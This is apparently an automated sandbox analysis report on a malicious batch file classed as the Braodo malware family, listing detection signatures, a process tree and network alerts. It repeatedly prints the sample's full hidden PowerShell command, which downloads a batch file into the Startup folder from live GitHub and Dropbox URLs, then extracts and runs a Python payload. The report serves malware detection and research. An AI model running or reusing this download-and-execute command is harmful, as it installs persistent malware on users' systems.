Windows Analysis Report
T3-03-17.bat

Overview

General Information

Sample name: T3-03-17.bat
Analysis ID: 1640885
MD5: 5b7a20fdae49559e8e2e1f10149f7f8f
SHA1: ee4d2ad920bb9790d8e88b563060ec99e2f1c9dc
SHA256: 702bdafb828a5d8d050e97f1fd59bb10be70c9ec7eadedcf5738b9d14d06d887
Tags: bat, user-JAMESWT_MHT

Detection

Braodo
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Braodo
Yara detected Powershell download and execute
Drops script or batch files to the startup folder
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7052 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • python.exe (PID: 4576 cmdline: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py MD5: A7F3026E4CF239F0A24A021751D17AE2)
        • cmd.exe (PID: 1428 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 412 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 1520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
T3-03-17.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 7052 | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security |
Process Memory Space: powershell.exe PID: 7052 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7052.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

          System Summary

          Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, CommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, CommandLine|base64offset|contains: , Image: C:\Users\Public\Document\python.exe, NewProcessName: C:\Users\Public\Document\python.exe, OriginalFileName: C:\Users\Public\Document\python.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7052, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, ProcessId: 4576, ProcessName: python.exe
          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "ver", CommandLine: C:\Windows\system32\cmd.exe /c "ver", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, ParentImage: C:\Users\Public\Document\python.exe, ParentProcessId: 4576, ParentProcessName: python.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ver", ProcessId: 1428, ProcessName: cmd.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document\Lib\ctypes\macholib\fetch_macholib.bat
          Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Document\python.exe, Initiated: true, ProcessId: 4576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 54803
          Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document.zip
          Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document\python.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 38ecd40d-09fe-416a-9232-2203b8645b58 Host Application = powershell.exe -WindowStyle Hidden -Command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43amp;st=i6clmk71amp;dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force Engine Version = 5.1.19041.1682 Runspace ID = 079800f0-ce20-4e2f-aec2-9150bca6e3f3 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 38ecd40d-09fe-416a-9232-2203b8645b58 Host Application = powershell.exe -WindowStyle Hidden -Command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 
'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43amp;st=i6clmk71amp;dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force Engine Version = 5.1.19041.1682 Runspace ID = 079800f0-ce20-4e2f-aec2-9150bca6e3f3 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 
NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e

          Data Obfuscation

          Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat

          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2025-03-17T20:35:04.224776+0100 | 2841189 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 140.82.121.3 | 443 | TCP
          2025-03-17T20:35:05.501746+0100 | 2841189 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 185.199.108.133 | 443 | TCP

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\Document\Lib\idlelib\Icons\README.txt
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\Document\Lib\idlelib\idle_test\README.txt
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\Document\Lib\idlelib\README.txt
          Source: unknown; HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49722 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.5:49724 version: TLS 1.2
